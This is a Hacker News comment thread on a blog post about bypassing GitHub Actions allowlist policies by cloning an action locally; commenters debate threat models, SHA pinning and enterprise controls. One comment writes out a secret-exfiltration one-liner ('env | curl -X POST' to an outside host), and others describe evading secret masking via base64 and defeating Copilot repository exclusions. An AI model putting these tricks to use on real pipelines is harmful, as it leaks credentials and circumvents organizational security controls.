[HN Gopher] Bypassing GitHub Actions policies in the dumbest way...
___________________________________________________________________
Bypassing GitHub Actions policies in the dumbest way possible
Author : woodruffw
Score : 146 points
Date : 2025-06-11 14:15 UTC (8 hours ago)
(HTM) web link (blog.yossarian.net)
(TXT) w3m dump (blog.yossarian.net)
| hiatus wrote:
| That the policy can be "bypassed" by a code change doesn't seem
| so severe. If you are not reviewing changes to your CI/CD
| workflows all hope is lost. Your code could be exfiltrated,
| secrets stolen, and more.
| internobody wrote:
| It's not simply a matter of review; depending on your setup
| these bypasses could be run before anyone even has eyes on the
| changes if your CI is triggered on push or on PR creation.
| rawling wrote:
| But similarly, couldn't you just write harmful stuff straight
| into the action itself?
| mystifyingpoi wrote:
| You definitely could, but it is more nuanced than that. You
| really don't want to be seen doing `env | curl -X POST
| http://myserver.cn` in a company repository. But using a
| legitimately named action doesn't look too suspicious.
| jadamson wrote:
| `pull_request_target` (which has access to secrets) runs in
| the context of the destination branch, so any malicious
| workflow would need to have already been committed.
|
| GitHub has a page on this:
|
| https://securitylab.github.com/resources/github-actions-
| prev...
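|
| The risky pattern that guidance warns about looks roughly like
| this (illustrative sketch; the script name is made up):
|
|     # the workflow definition comes from the base branch and
|     # secrets are available
|     on: pull_request_target
|
|     jobs:
|       test:
|         runs-on: ubuntu-latest
|         steps:
|           - uses: actions/checkout@v4
|             with:
|               # explicitly checking out the untrusted PR head
|               # re-introduces attacker-controlled code
|               ref: ${{ github.event.pull_request.head.sha }}
|           - run: ./ci/test.sh   # runs with secrets reachable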
| woodruffw wrote:
| The point of the post is that review is varied in practice: if
| you're a large organization you should be reviewing the code
| itself for changes, but I suspect many orgs aren't tracking
| every action (and every version of every action) introduced in
| CI/CD changes. That's what policies are useful for, and why
| bypasses are potentially dangerous.
|
| Or as an intuitive framing: if you can understand the value of
| branch protection and secret pushing policies for helping your
| junior engineers, the same holds for your CI/CD policies.
| hiatus wrote:
| The problem is not related to tracking every action or
| version in CI/CD changes. Right now, you can just curl a
| binary and run that. How is that any different from the
| exploit here? I guess people may have had a false sense of
| security if they had implemented those policies, but I would
| posit those people didn't really understand their CI/CD
| system if they thought those policies alone would prevent
| arbitrary code execution.
| woodruffw wrote:
| I think it's a difference in category; pulling random
| binaries from the Internet is obviously not good, but it's
| empirically mostly done in a pointwise manner. Actions on
| the other hand are pulled from a "marketplace", are subject
| to automatic bumps via things like Dependabot and
| Renovate, can be silently rewritten thanks to tag
| mutability, etc.
|
| Clearly in an ideal world runners would be hermetic. But I
| think the presence of other sources of non-hermeticity
| doesn't justify a poorly implemented policy feature on
| GitHub's part.
| solumos wrote:
| "We only allow actions published by our organization and
| reusable workflows"
|
| and
|
| "We only allow actions published by our organization and
| reusable workflows OR ones that are manually downloaded from an
| outside source"
|
| are very very different policies
| hiatus wrote:
| But there is no policy preventing external downloads in
| general, is there? I can curl a random script from a
| malicious website, too.
| kj4ips wrote:
| This is a prime example of "If you make an unusable secure
| system, the users will turn it into an insecure usable one."
|
| If someone is actively subverting a control like this, it
| probably means that the control has morphed from a guardrail into
| a log across the tracks.
|
| Somewhat in the same vein as AppLocker &co. Almost everyone says
| you should be using it, but almost no-one does, because it takes
| a massive amount of effort just to understand what "acceptable
| software" is across your entire org.
| solumos wrote:
| The implied fix to the "unusable secure system" is forking the
| checkout action to your org and referencing it there.
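|
| I.e. something like this, with a hypothetical fork at
| your-org/checkout:
|
|     # a reviewed fork owned by your org, so the "our
|     # organization only" allowlist still permits it
|     - uses: your-org/checkout@v4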
| hiatus wrote:
| That's not a fix though, is it? Git tools are already on the
| runner. You could check out code from public repos using the CLI,
| and you could hardcode a token into the workflow if you
| wanted to access a private repo (assuming the malicious
| internal user doesn't have admin privileges to add a secret).
| welshwelsh wrote:
| Nobody outside of the IT security bubble thinks that using
| AppLocker is a sensible idea.
|
| Companies have no business telling their employees which
| specific programs they can and cannot run to do their jobs,
| that's an absurd level of micromanagement.
| neilv wrote:
| > _Companies have no business telling their employees which
| specific programs they can and cannot run to do their jobs,
| that's an absurd level of micromanagement._
|
| I'm usually on the side of empowering workers, but I believe
| sometimes the companies _do_ have business saying this.
|
| One reason is that much of the software industry has become a
| batpoop-insane slimefest of privacy (IP) invasion, as well as
| grossly negligent security.
|
| Another reason is that the company may be held liable for
| license terms of the software.
|
| Another reason is that the company may be held liable for
| illegal behavior of the software (e.g., if the software
| violates some IP of another party).
|
| Every piece of software might expose the company to these
| risks. And maybe disproportionately so, if software is being
| introduced by the "I'm gettin' it done!" employee, rather
| than by someone who sees vetting for the risks as part of
| their job.
| lelandbatey wrote:
| Developers are going to write code to do things for them,
| such as small utility programs for automating work. Each
| custom program is a potentially brand new binary, never
| seen before by the security auditing software. Does every
| program written by every dev have to be cleared? Is it best
| in such a system to get an interpreter cleared so I can use
| that to run whatever scripts I need?
| xmprt wrote:
| This is a strawman argument. If a developer writes code
| that does something malicious then it's on the developer.
| If they install a program then the accountability is a
| bit fuzzier. It's partly on the developer, partly on
| security (for allowing an unprivileged user to do
| malicious/dangerous things even unknowingly), and partly
| on IT (for allowing the unauthorized program to run
| without any verification).
| nradov wrote:
| That level of micromanagement can be quite sensible depending
| on the employee role. It's not needed for developers doing
| generic software work without any sensitive data. But if the
| employee is, let's say, a nurse doing medical chart review at
| an insurance company then there is absolutely no need for
| them to use anything other than specific approved programs.
| Allowing use of random software greatly increases the
| potential attack surface area, and in the worst case could
| result in something like a malware penetration and/or HIPAA
| privacy violation.
| bigfatkitten wrote:
| Anyone who's been sued by Oracle for not paying for Java SE
| runtime licences thinks it's an outstanding idea.
|
| https://itwire.com/guest-articles/guest-opinion/is-an-
| oracle...
|
| Security practitioners are big fans of application
| whitelisting for a reason: Your malware problems pretty much
| go away if malware cannot execute in the first place.
|
| The Australian Signals Directorate for example has
| recommended (and more recently, mandated) application
| whitelisting on government systems for the past 15 years or
| so, because it would've prevented the majority of intrusions
| they've investigated.
|
| https://nsarchive.gwu.edu/sites/default/files/documents/5014.
| ..
| throwaway889900 wrote:
| Not only can you yourself manually check out a specific repo, but
| if you have submodules and do a recursive checkout, it's also
| possible to pull in other security nightmares from places you
| never expected. That would be one complicated attack to pull
| off though, a chain of compromised workflows, haha
| lmm wrote:
| Meh. Arbitrary code execution allows you to execute arbitrary
| code. If you curl | sh something in your github action script
| then that will "bypass the policy" too.
| ghusto wrote:
| > world's dumbest policy bypass: instead of doing uses:
| actions/checkout@v4, the user can git clone (or otherwise fetch)
| the actions/checkout repository into the runner's filesystem, and
| then use uses: ./path/to/checkout to run the very same action
|
| Good lord.
|
| This is akin to saying "Instead of doing `apt-get install
| <PACKAGE>`, one can bypass the apt policies by downloading the
| package and running `dpkg -i <PACKAGE>`".
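|
| Spelled out as a workflow, the trick is roughly this
| (illustrative sketch; the clone path is made up):
|
|     steps:
|       # fetch the action's source with plain git, so the policy
|       # never sees a "uses:" reference to an external action
|       - run: >
|           git clone --depth 1
|           https://github.com/actions/checkout
|           "$GITHUB_WORKSPACE/.tmp-checkout"
|       # then run the very same action from the local path
|       - uses: ./.tmp-checkout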
| woodruffw wrote:
| I think a salient difference is that apt policies apply to
| apt, whereas GitHub goes to some lengths to document GitHub
| Actions policies as applying to `uses:` clauses writ large.
|
| (But also: in a structural sense, if a system _did_ have `apt`
| policies that were intended to prevent dependency introduction,
| then such a system _should_ prevent that kind of bypass. That
| doesn't mean that the bypass is life-or-death, but it's a
| matter of hygiene and misuse prevention.)
| gawa wrote:
| > which GitHub goes to extents to document GitHub Actions
| policies as applying to `uses:` clauses
|
| If it were phrased like this, then you would be right: the
| docs would give a false sense of security and would be
| misleading. So I went to check, but I didn't find such an
| assertion in the linked docs (please let me know if I missed
| it). [0]
|
| So I agree with the commenter above (and GitHub) that
| "editing the GitHub action to add steps to download and run a
| script" is not a fundamental flaw of a system designed to do
| exactly that: run commands as instructed by the user.
|
| Overall we should always ask ourselves: what's the threat
| model here? If anyone can edit the GitHub Actions workflow,
| they can make it do a lot of things, and this "GitHub Actions
| policy" filter toggle is the least of our worries. The only
| way to make the CI/CD pipeline secure (especially since the
| CD part usually has access to the outside world) is to
| prevent people from editing and running anything they want in
| it. In the case of GitHub Actions, that means restricting
| users' access to the repository itself.
|
| [0] https://blog.yossarian.net/2025/06/11/github-actions-
| policie...
| woodruffw wrote:
| That's from here[1].
|
| I suppose there's room for interpretation here, but I think
| an intuitive scan of "Allowing select actions and reusable
| workflows to run" is that the contrapositive ("not allowed
| actions and reusable workflows will not run") also holds.
| The trick in the post violates that contrapositive.
|
| I think people are really getting caught up on the code
| execution part of this, which is not really the point. The
| point is that a policy needs to be encompassing to have its
| intended effect, which in the case of GitHub Actions is
| presumably to allow large organizations/companies to
| inventory their CI/CD dependencies and make globally
| consistent, auditable decisions about them.
|
| Or in other words: the point here is similar to the reason
| companies run their own private NPM, PyPI, etc. indices --
| the point is not to stop the junior engineers from
| inserting shoddy dependencies, but to _know_ when they do
| so that remediation becomes a matter of policy, not "find
| everywhere we depend on this component." Bypassing that
| policy means that the worst of both worlds happens: you
| have the shoddy dependency _and_ the policy-view of the
| world doesn't believe you do.
|
| [1]: https://docs.github.com/en/repositories/managing-your-
| reposi...
| qbane wrote:
| Also you can leak _any_ secrets by making connections to
| external services via the internet and simply sending the
| secrets there.
| formerly_proven wrote:
| Not in many enterprisey CI systems you can't, those
| frequently have hermetic build environments.
| msgodel wrote:
| Nothing makes me want to quit software more than
| enterprisey CI systems.
| qbane wrote:
| I think GitHub is correct that the bypass itself is not a
| vulnerability, but just like the little tooltip on GitHub's
| "create secret gist" button, GitHub can do a better job
| of clarifying things in the "Actions permissions" section.
| mystifyingpoi wrote:
| You can also print them to the console in quadruple base64 in
| reverse; the trick is getting away with it.
| hk1337 wrote:
| This is why I avoid using non-official actions where possible and
| always set a version for the action.
|
| We had a contractor who used some random action to ssh files to
| the server, and referenced master as the version to boot. First,
| it isn't that difficult to upload files and run commands over
| ssh yourself, but more importantly the action owner could easily
| add code to save private keys and other information to another
| server.
|
| I am a bit confused on the "bypass" though. Wouldn't the
| adversary need push access to the repository to edit the workflow
| file? So, the portion that needs hardening is ensuring the wrong
| people do not have access to push files to the repository?
|
| On public repositories I could see this being an issue if the
| bypass is done in a section of the workflow that runs when a PR
| is created. For private repositories, you should take care about
| who you give access to.
| gawa wrote:
| > This is why I avoid using non-official actions where possible
| and always set a version for the action.
|
| Those are good practices. I would add that pinning the version
| (tag) is not enough, as we learnt from the tj-actions/changed-
| files incident. We should pin the commit SHA [0]. GitHub states
| this in its official documentation [1] as well:
|
| > Pin actions to a full length commit SHA
|
| > Pin actions to a tag only if you trust the creator
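|
| Concretely (the version tag and SHA below are illustrative,
| not real pins):
|
|     # mutable: the tag can be re-pointed after you review it
|     - uses: tj-actions/changed-files@v44
|     # immutable: a full-length commit SHA
|     - uses: tj-actions/changed-files@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0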
|
| [0] https://www.stepsecurity.io/blog/harden-runner-detection-
| tj-...
|
| [1] https://docs.github.com/en/actions/security-for-github-
| actio...
| jand wrote:
| > I am a bit confused on the "bypass" though. Wouldn't the
| adversary need push access to the repository to edit the
| workflow file? So, the portion that needs hardening is ensuring
| the wrong people do not have access to push files to the
| repository?
|
| I understand it that way, too. But: Having company-wide
| policies in place (regarding actions) might be
| misunderstood/used as a security measure for the company
| against malicious/sloppy developers.
|
| So documenting or highlighting the behaviour helps the devops
| guys avoid a false sense of security. Not much more.
| monster_truck wrote:
| Had these exact same thoughts while I was configuring a series of
| workflows and scripts to get around the multiple unjustified and
| longstanding restrictions on what things are allowed to happen
| when.
|
| That sinking feeling when you search for how to do something and
| all of the top results are issues that were opened over a decade
| ago...
|
| It is especially painful trying to use GitHub to do anything
| useful at all after being spoiled by working exclusively from a
| locally hosted GitLab instance. I gave up on trying to get things
| to cache correctly after a few attempts at following their
| documentation; it's not like I'm paying for it.
|
| Was also very surprised to see that the recommended/suggested
| default configuration that runs CodeQL had burned over 2600
| minutes of actions in just a day of light use, nearly doubling
| the total I had from weeks of sustained heavy utilization. Who's
| paying for that??
| Already__Taken wrote:
| I'm baffled you can't clone internal/private repos with
| anything other than a developer PAT. They have a UI to share
| access for workflows, let cloning use that...
| throwaway52176 wrote:
| I use GitHub apps for this, it's cumbersome but works.
| saghm wrote:
| It used 1.8 days of time to run for a single day? I'm less
| curious about who's paying for it than who's _using_ it on
| your repo, because I can't even imagine having an average of
| almost two people scanning a codebase every single minute of
| the day.
| heelix wrote:
| Not the OP, but a poorly behaving repo can turn and burn for
| six hours on every PR, rather than the handful of minutes one
| would expect. It happens - but usually that sort of thing
| should be spotted and fixed. More often than not, something
| is trying to pull artifacts and timing out rather than it
| being a giant monorepo.
| fkyoureadthedoc wrote:
| This doesn't seem like a big deal to be honest.
|
| My main problem with the policy and how it's implemented at my
| job is that the ones setting the policies aren't the ones
| impacted by them, and never consult people who are. Our security
| team tells our GitHub admin team that we can't use 3rd party
| actions.
|
| Our GitHub admin team says sure, sounds good. They don't care,
| because they don't use actions, and they in fact don't deliver
| anything at all. Security team also delivers nothing, so they
| don't care. Combined, these teams' crowning achievement is buying
| GitHub Enterprise and moving it back and forth between cloud and
| on-prem 3 times in the last 7 years.
|
| As a developer, I'll read the action I want to use, and if it
| looks good I just clone the code and upload it into our own
| org/repo. I'm already executing a million npm modules in the same
| context that do god knows what. If anyone complains, it's getting
| hit by the same static/dynamic analysis tools as the rest of the
| code and dependencies.
| mook wrote:
| It sounds like reading the code and forking it (therefore
| preventing malicious updates) totally satisfies the intent
| behind the policy, then.
|
| My company has a similar whitelist of actions, with a list of
| third-party actions that were evaluated and rejected. A lot of
| the rejected stuff seems to be some sort of helper to make a
| release, which pretty much has a blanket suggestion to use the
| `gh` CLI already on the runners.
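|
| For example, a release step with the preinstalled `gh` CLI
| instead of a third-party release action (tag and paths made
| up):
|
|     - name: Create release
|       run: gh release create "v1.2.3" --generate-notes ./dist/*
|       env:
|         GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}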
| clysm wrote:
| I'm not seeing the security issue here. Arbitrary code execution
| leads to arbitrary code execution?
|
| Seems like policies are impossible to enforce in general on what
| can be executed, so the only recourse is to limit secret access.
|
| Is there a demonstration of this being able to access/steal
| secrets of some sort?
| dijksterhuis wrote:
| It's less of a "use this to do nasty shit to a bunch of
| unsuspecting victims" one, and more of a "people can get around
| your policies when you actually need policies that limit your
| users".
|
| 1. BigEnterpriseOrg central IT dept click the tick boxes to
| disable outside actions because <INSERT SECURITY FRAMEWORK>
| compliance requires not using external actions [0]
|
| 2. BigBrainedDeveloper wants to use ExternalAction, so uses the
| method documented in the post because they have a big brain
|
| 3. BigEnterpriseOrg is no longer compliant with <INSERT
| SECURITY FRAMEWORK> and, more importantly, the central IT dept
| have zero idea this is happening without continuously
| inspecting all the CI workflows for every team they support and
| signing off on all code changes [1]
|
| That's why someone else's point that "you're supposed to fork
| the action into your organisation" becomes a solution if
| disabling local `uses:` is added as an option in the tick boxes
| -- the central IT dept has visibility over what's being used and
| by whom if BigBrainedDeveloper has to ask for ExternalAction to
| be forked into the BigEnterpriseOrg GH organisation. The central
| IT dept's involvement is then just reviewing the codebase,
| forking it, and maintaining updates.
|
| NOTE: This is not a panacea against _all_ things that go
| against <INSERT SECURITY FRAMEWORK> compliance (downloading
| external binaries, etc.). But it would close an easy gap.
|
| ----
|
| [0]: or something, i dunno, plenty of reasons enterprise IT
| depts do stuff that frustrates internal developers
|
| [1]: A sure-fire way to piss off every single one of your
| internal developers.
| mystifyingpoi wrote:
| > Seems like policies are impossible to enforce
|
| The author addresses exactly that: "ineffective policy
| mechanisms are worse than missing policy mechanisms, because
| they provide all of the feeling of security through compliance
| while actually incentivizing malicious forms of compliance."
|
| And I totally agree. It is so abundant. "Yes, we are in
| compliance with all the strong password requirements, strictly
| speaking there is one strong password for every single admin
| user for all services we use, but that's not in the checklist,
| right?"
| TheTaytay wrote:
| I don't understand the risk honestly.
|
| Anyone who can push code to the repo can already do anything in
| GitHub Actions. This security measure was never designed to
| protect against a developer doing something malicious. Whether
| they clone another action into the repo or write custom scripts
| themselves, I don't see how GitHub's measures could protect
| against that.
| woodruffw wrote:
| A mitigation for this exact policy mechanism is included in the
| post.
|
| (The point is _not_ directly malicious introductions: it's
| supply chain risk in the form of engineers introducing
| actions/reusable workflows that are themselves
| malleable/mutable/subject to risk. A policy that claims to do
| that should _in fact_ do it, or explicitly document its
| limitations.)
| x0x0 wrote:
| The risk is the same reason we don't allow any of our servers
| to make outgoing network connections except to a limited host
| lists. eg backend servers can talk to the gateway, queue /
| databases, and an approved list of domains for apis and nothing
| else.
|
| The same guard helps prevent accidents (not maliciousness) as
| well as security breaches. If code somehow gets onto our
| systems but we block most outbound connections, exfiltration
| is much harder.
|
| Yes, people do code review, but stuff slips through. See e.g.
| Google switching one of their core libs from doing mkdir
| directly to shelling out to run mkdir -p (tada! now every
| invocation had better understand shell escaping rules). That
| made it through code review. People
| are imperfect; telling your network no outbound connections
| (except for this small list) is much closer to perfect.
| hk1337 wrote:
| I haven't tested this, but the main possible risk is users
| creating PRs on public repositories with actions that run on
| pull request.
| SamuelAdams wrote:
| The risk is simple enough. GitHub Enterprise allows admins to
| configure a list of actions to allow or deny. Ideally these
| actions are published in the GitHub Marketplace.
|
| The idea is that the organization does not trust these third-
| parties, therefore they disable their access.
|
| However, this technique bypasses those lists by cloning open-
| source actions directly onto the runner. At that point it's
| just running code, no different from if the maintainers wrote a
| complex action themselves.
| bob1029 wrote:
| I feel like GitHub's CI/CD offering is too "all-in" now. Once we
| are at a point where the SCM tool is a superset of AWS circa
| 2010, we probably need to step back and consider alternatives.
|
| A more ideal approach could be to expose a simple REST API or
| webhook that allows for the repo owner to integrate external
| tooling that is better suited for the purpose of enforcing status
| checks.
|
| I would much rather write CI/CD tooling in something like python
| or C# than screw around with yaml files and weird shared
| libraries of actions. You can achieve something approximating
| this right now, but you would have to do it by way of GH Actions
| to some extent.
|
| PRs are hardly latency sensitive, so polling a REST API once
| every 60 seconds seems acceptable to me. This is essentially what
| we used to do with Jenkins, except we'd just poll the repo head
| instead of some weird API.
| korm wrote:
| GitHub has both webhooks and an extensive API. What you are
| describing is entirely doable, nothing really requires GitHub
| Actions as far as I know.
|
| Most people opt for it for convenience. There's a balance you
| can strike between all the yaml and shared actions, and running
| your own scripts.
| masklinn wrote:
| > A more ideal approach could be to expose a simple rest API or
| webhook that allows for the repo owner to integrate external
| tooling that is better suited for the purpose of enforcing
| status checks.
|
| That... has existed for years?
| https://docs.github.com/en/rest?apiVersion=2022-11-28
|
| That was the only thing available before github actions. That
| was also the only thing available if you wanted to implement
| the not rocket science principle before merge queues.
|
| It's hard to beat free tho, especially for OSS maintainership.
|
| And GHA gives you concurrency for which you'd otherwise have to
| maintain an orchestrator (or a completely bespoke solution):
| just create multiple jobs or workflows.
|
| And you don't need to deal with tokens to send statuses with.
| And you get all the logs and feedback in the git interface
| rather than having to BYO again. And you can actually have PRs
| marked as merged when you rebase or squash them (a feature
| request which is now in middle school:
| https://github.com/isaacs/github/issues/2)
|
| > PRs are hardly latency sensitive, so polling a REST API once
| every 60 seconds seems acceptable to me.
|
| There is nothing to poll:
| https://docs.github.com/en/webhooks/types-of-webhooks
| sureglymop wrote:
| I don't understand GitHub's popularity in the first place... You
| have git as the interoperable version control "protocol", but
| then they slap proprietary issue, PR, CI and project management
| features on top that one can't bring along when migrating
| away? At that stage what is even the point of it being built on
| git? Also, for all that is great about git, I don't think it's
| the best version control system we could have at all. I wish
| we'd do some serious wheel reinventing here.
| chelmzy wrote:
| Does anyone know how to query what actions have been imported
| from the Actions Marketplace (or anywhere) in GitHub Enterprise?
| I've been lazily looking into this for a bit and can't find a
| straight answer.
| solatic wrote:
| If your Security folk are trying to draw up a wall around the
| enterprise (prevent using stuff not intentionally mirrored in)
| but there are no network controls - no IP-address-based
| firewalls, no DNS firewalls, no Layer 7 firewalls (like AWS
| VPC Endpoint Policy or GCP VPC Service Controls) governing
| access to object storage and the like - then, quite frankly,
| the implementation is either immature or incompetent.
|
| If you work for an org with a restrictive policy but no
| restrictive network controls, anyone at work could stand up a
| $5 VPS and route around the policy. Or a Raspberry Pi at home
| and DynDNS. Or a million other options.
|
| Don't be stupid and think that a single security control means
| you don't need to do defense in depth.
| OptionOfT wrote:
| We forked the actions as a submodule, and then pointed the uses
| to that directory.
|
| That way we were still tracking the individual commits which we
| approved as a team.
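|
| Roughly (directory name made up; the initial checkout still has
| to be an action the policy allows):
|
|     steps:
|       - uses: actions/checkout@v4
|         with:
|           submodules: true   # brings in the vendored actions
|       - uses: ./third_party/some-action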
|
| Now there is an interesting dichotomy. On one hand PMs want us to
| leverage GitHub Actions to build out stuff more quickly using
| pre-built blocks, but on the other hand security has no capacity
| or interest to whitelist actions (not to mention that the
| whitelist is limited to 100 actions as per the article).
|
| That said, even pinning GitHub actions to a full-length commit
| SHA isn't perfect for container actions, as they can refer to a
| Docker tag, and the contents of that tag can be changed:
| https://docs.github.com/en/actions/sharing-automations/creat...
|
| E.g. I publish an action with code like:
|
|     runs:
|       using: 'docker'
|       image: 'docker://optionoft/actions-tool:v3.0.0'
|
| You use the action, and pin it to the SHA of this commit.
|
| I get hacked, and a hacker publishes a new version of
| optionoft/actions-tool:v3.0.0
|
| You wouldn't even get a Dependabot update PR.
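|
| (One possible mitigation, assuming the docker:// form accepts a
| digest reference the way a plain docker pull does: the action
| author pins the image by digest instead of by tag. The digest
| below is truncated and made up.
|
|     runs:
|       using: 'docker'
|       image: 'docker://optionoft/actions-tool@sha256:9f86d08...'
|
| Tags can be re-pointed; digests can't.)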
| opello wrote:
| Maybe there's a future Dependabot feature to create FYI issues
| when in-use tags change?
| john-h-k wrote:
| There is no meaningful way to get around this. Ban them in
| `uses:` keys? Fine, they just put it in a bash script and run
| that. Etc., etc. If it allows running arbitrary code, this will
| always exist.
| zingababba wrote:
| Copilot repository exclusions are another funny control from
| GitHub. It gets the local repo context from the .git/config
| remote origin URL. Just comment that out and you can use Copilot
| on an 'excluded' repo. Remove the comment to push your changes.
| Very much a paper control.
| gchamonlive wrote:
| I'm inclined to add https://github.com/marketplace/actions/sync-
| to-gitlab to all my repos in github, so that I can tap into the
| social value of GitHub's community and the technical value of
| GitLab's everything else.
| 0xbadcafebee wrote:
| You call it a security issue. I call it my only recourse when the
| god damn tyrannical GitHub Org admins lock it down so hard I
| can't do my job.
|
| (yes it is a security issue (as it defeats a security policy) but
| I hope it remains unfixed because it's a stupid policy)
| jamesblonde wrote:
| Run data integration pipelines with GitHub Actions -
|
| https://dlthub.com/docs/walkthroughs/deploy-a-pipeline/deplo...
|
| It's the easiest way for many startups to get people to try out
| your software for free.
___________________________________________________________________
(page generated 2025-06-11 23:00 UTC)